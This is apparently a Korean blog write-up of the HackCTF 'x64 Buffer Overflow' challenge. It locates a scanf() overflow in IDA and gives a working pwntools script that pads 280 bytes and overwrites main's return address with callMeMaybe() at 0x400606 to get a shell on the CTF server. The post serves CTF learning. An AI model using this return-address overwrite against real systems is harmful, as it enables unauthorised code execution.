ii4gsp
HackCTF - x64 Buffer Overflow 본문
파일을 다운받아 주자.
IDA로 열어보면 scanf()함수에서 취약점이 발생한다.
callMeMaybe()함수에서 쉘을 실행시킨다.
main()함수의 ret를 callMeMaybe()의 함수로 조작해주면 된다.
callMeMaybe()함수의 주소는 0x0000000000400606이다.
dummy 280byte를 채우고 callMeMaybe()함수의 주소를 넣어주면 된다.
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3004)
payload = ''
payload += '\x90' * 280
payload += p64(0x0000000000400606)
r.sendline(payload)
r.interactive()
소스코드를 작성해주자.
'시스템 해킹 > HackCTF' 카테고리의 다른 글
HackCTF - Simple_Overflow_ver_2 (0) | 2020.02.09 |
---|---|
HackCTF - x64 Simple_size_BOF (0) | 2020.02.09 |
HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2020.02.09 |
HackCTF - Basic_FSB (0) | 2020.02.09 |
HackCTF - Basic_BOF #2 (0) | 2020.02.08 |
Comments